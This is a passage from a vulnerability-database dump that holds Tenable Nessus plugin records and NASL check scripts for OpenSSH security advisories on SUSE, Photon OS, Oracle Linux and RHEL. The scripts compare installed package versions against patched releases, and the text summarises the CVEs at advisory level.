SUSE-SLE-RPI-12-SP2-2017-138=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-138=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-138=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/24\");\n script_set_attribute(attribute:\"generated_plugin\", 
value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! 
preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-7.2p2-66.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-debuginfo-7.2p2-66.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-debuginfo-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-debugsource-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-fips-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-helpers-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-helpers-debuginfo-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-7.2p2-66.3\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-debuginfo-7.2p2-66.3\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-debuginfo-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-debugsource-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-helpers-7.2p2-66.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"openssh-helpers-debuginfo-7.2p2-66.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested 
= pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-01T01:06:55", "description": "An update of the openssh package has been released.", "edition": 17, "cvss3": {"score": 7.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2019-02-07T00:00:00", "title": "Photon OS 1.0: Openssh PHSA-2017-0001", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10012"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:openssh", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2017-0001_OPENSSH.NASL", "href": "https://www.tenable.com/plugins/nessus/121665", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0001. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121665);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10010\", \"CVE-2016-10012\");\n\n script_name(english:\"Photon OS 1.0: Openssh PHSA-2017-0001\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the openssh package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-16.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-10009\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"openssh-7.4p1-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"openssh-7.4p1-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"openssh-7.4p1-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"openssh-debuginfo-7.4p1-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"openssh-debuginfo-7.4p1-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"openssh-debuginfo-7.4p1-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T04:42:31", "description": "From Red Hat Security Advisory 2017:2029 :\n\nAn update for openssh is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security 
has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nThe following packages have been upgraded to a later upstream version:\nopenssh (7.4p1). (BZ#1341754)\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. (CVE-2016-6210)\n\n* It was found that OpenSSH did not limit password lengths for\npassword authentication. A remote unauthenticated attacker could use\nthis flaw to temporarily trigger high CPU consumption in sshd by\nsending long passwords. (CVE-2016-6515)\n\n* It was found that ssh-agent could load PKCS#11 modules from\narbitrary paths. An attacker having control of the forwarded\nagent-socket on the server, and the ability to write to the filesystem\nof the client host, could use this flaw to execute arbitrary code with\nthe privileges of the user running ssh-agent. (CVE-2016-10009)\n\n* It was found that the host private key material could possibly leak\nto the privilege-separated child processes via re-allocated memory. An\nattacker able to compromise the privilege-separated process could\ntherefore obtain the leaked key information. (CVE-2016-10011)\n\n* It was found that the boundary checks in the code implementing\nsupport for pre-authentication compression could have been optimized\nout by certain compilers. 
An attacker able to compromise the\nprivilege-separated process could possibly use this flaw for further\nattacks against the privileged monitor process. (CVE-2016-10012)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.4 Release Notes linked from the References section.", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-08-09T00:00:00", "title": "Oracle Linux 7 : openssh (ELSA-2017-2029)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10708", "CVE-2016-10011", "CVE-2016-10009", "CVE-2016-6515", "CVE-2016-6210", "CVE-2016-10012"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:openssh-server-sysvinit", "p-cpe:/a:oracle:linux:openssh", "p-cpe:/a:oracle:linux:openssh-keycat", "p-cpe:/a:oracle:linux:openssh-server", "p-cpe:/a:oracle:linux:openssh-askpass", "p-cpe:/a:oracle:linux:openssh-ldap", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:openssh-clients", "p-cpe:/a:oracle:linux:openssh-cavs", "p-cpe:/a:oracle:linux:pam_ssh_agent_auth"], "id": "ORACLELINUX_ELSA-2017-2029.NASL", "href": "https://www.tenable.com/plugins/nessus/102296", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:2029 and \n# Oracle Linux Security Advisory ELSA-2017-2029 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102296);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/09/27 13:00:38\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-10708\", \"CVE-2016-6210\", \"CVE-2016-6515\");\n script_xref(name:\"RHSA\", value:\"2017:2029\");\n\n script_name(english:\"Oracle Linux 7 : openssh (ELSA-2017-2029)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n 
attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:2029 :\n\nAn update for openssh is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nThe following packages have been upgraded to a later upstream version:\nopenssh (7.4p1). (BZ#1341754)\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. (CVE-2016-6210)\n\n* It was found that OpenSSH did not limit password lengths for\npassword authentication. A remote unauthenticated attacker could use\nthis flaw to temporarily trigger high CPU consumption in sshd by\nsending long passwords. (CVE-2016-6515)\n\n* It was found that ssh-agent could load PKCS#11 modules from\narbitrary paths. An attacker having control of the forwarded\nagent-socket on the server, and the ability to write to the filesystem\nof the client host, could use this flaw to execute arbitrary code with\nthe privileges of the user running ssh-agent. (CVE-2016-10009)\n\n* It was found that the host private key material could possibly leak\nto the privilege-separated child processes via re-allocated memory. An\nattacker able to compromise the privilege-separated process could\ntherefore obtain the leaked key information. 
(CVE-2016-10011)\n\n* It was found that the boundary checks in the code implementing\nsupport for pre-authentication compression could have been optimized\nout by certain compilers. An attacker able to compromise the\nprivilege-separated process could possibly use this flaw for further\nattacks against the privileged monitor process. (CVE-2016-10012)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.4 Release Notes linked from the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-August/007091.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-askpass\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-cavs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-keycat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openssh-server\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:openssh-server-sysvinit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:pam_ssh_agent_auth\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"openssh-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"openssh-askpass-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"openssh-cavs-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"openssh-clients-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"openssh-keycat-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"openssh-ldap-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"openssh-server-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"openssh-server-sysvinit-7.4p1-11.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"pam_ssh_agent_auth-0.10.3-1.11.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh / openssh-askpass / openssh-cavs / openssh-clients / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-01T05:08:15", "description": "An update for openssh is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of 
Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nThe following packages have been upgraded to a later upstream version:\nopenssh (7.4p1). (BZ#1341754)\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. (CVE-2016-6210)\n\n* It was found that OpenSSH did not limit password lengths for\npassword authentication. A remote unauthenticated attacker could use\nthis flaw to temporarily trigger high CPU consumption in sshd by\nsending long passwords. (CVE-2016-6515)\n\n* It was found that ssh-agent could load PKCS#11 modules from\narbitrary paths. An attacker having control of the forwarded\nagent-socket on the server, and the ability to write to the filesystem\nof the client host, could use this flaw to execute arbitrary code with\nthe privileges of the user running ssh-agent. (CVE-2016-10009)\n\n* It was found that the host private key material could possibly leak\nto the privilege-separated child processes via re-allocated memory. An\nattacker able to compromise the privilege-separated process could\ntherefore obtain the leaked key information. (CVE-2016-10011)\n\n* It was found that the boundary checks in the code implementing\nsupport for pre-authentication compression could have been optimized\nout by certain compilers. An attacker able to compromise the\nprivilege-separated process could possibly use this flaw for further\nattacks against the privileged monitor process. 
(CVE-2016-10012)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.4 Release Notes linked from the References section.", "edition": 29, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-08-02T00:00:00", "title": "RHEL 7 : openssh (RHSA-2017:2029)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10708", "CVE-2016-10011", "CVE-2016-10009", "CVE-2016-6515", "CVE-2016-6210", "CVE-2016-10012"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.7", "p-cpe:/a:redhat:enterprise_linux:openssh", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:openssh-askpass", "p-cpe:/a:redhat:enterprise_linux:openssh-debuginfo", "p-cpe:/a:redhat:enterprise_linux:openssh-ldap", "p-cpe:/a:redhat:enterprise_linux:openssh-server-sysvinit", "p-cpe:/a:redhat:enterprise_linux:openssh-clients", "p-cpe:/a:redhat:enterprise_linux:openssh-server", "cpe:/o:redhat:enterprise_linux:7.6", "p-cpe:/a:redhat:enterprise_linux:openssh-cavs", "p-cpe:/a:redhat:enterprise_linux:pam_ssh_agent_auth", "p-cpe:/a:redhat:enterprise_linux:openssh-keycat"], "id": "REDHAT-RHSA-2017-2029.NASL", "href": "https://www.tenable.com/plugins/nessus/102112", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:2029. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102112);\n script_version(\"3.11\");\n script_cvs_date(\"Date: 2019/10/24 15:35:43\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-10708\", \"CVE-2016-6210\", \"CVE-2016-6515\");\n script_xref(name:\"RHSA\", value:\"2017:2029\");\n\n script_name(english:\"RHEL 7 : openssh (RHSA-2017:2029)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for openssh is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nOpenSSH is an SSH protocol implementation supported by a number of\nLinux, UNIX, and similar operating systems. It includes the core files\nnecessary for both the OpenSSH client and server.\n\nThe following packages have been upgraded to a later upstream version:\nopenssh (7.4p1). (BZ#1341754)\n\nSecurity Fix(es) :\n\n* A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated\nattacker could possibly use this flaw to determine valid user names by\nmeasuring the timing of server responses. (CVE-2016-6210)\n\n* It was found that OpenSSH did not limit password lengths for\npassword authentication. A remote unauthenticated attacker could use\nthis flaw to temporarily trigger high CPU consumption in sshd by\nsending long passwords. (CVE-2016-6515)\n\n* It was found that ssh-agent could load PKCS#11 modules from\narbitrary paths. 
An attacker having control of the forwarded\nagent-socket on the server, and the ability to write to the filesystem\nof the client host, could use this flaw to execute arbitrary code with\nthe privileges of the user running ssh-agent. (CVE-2016-10009)\n\n* It was found that the host private key material could possibly leak\nto the privilege-separated child processes via re-allocated memory. An\nattacker able to compromise the privilege-separated process could\ntherefore obtain the leaked key information. (CVE-2016-10011)\n\n* It was found that the boundary checks in the code implementing\nsupport for pre-authentication compression could have been optimized\nout by certain compilers. An attacker able to compromise the\nprivilege-separated process could possibly use this flaw for further\nattacks against the privileged monitor process. (CVE-2016-10012)\n\nAdditional Changes :\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.4 Release Notes linked from the References section.\"\n );\n # https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/7/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3395ff0b\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:2029\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6210\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6515\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-10009\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-10011\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-10012\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
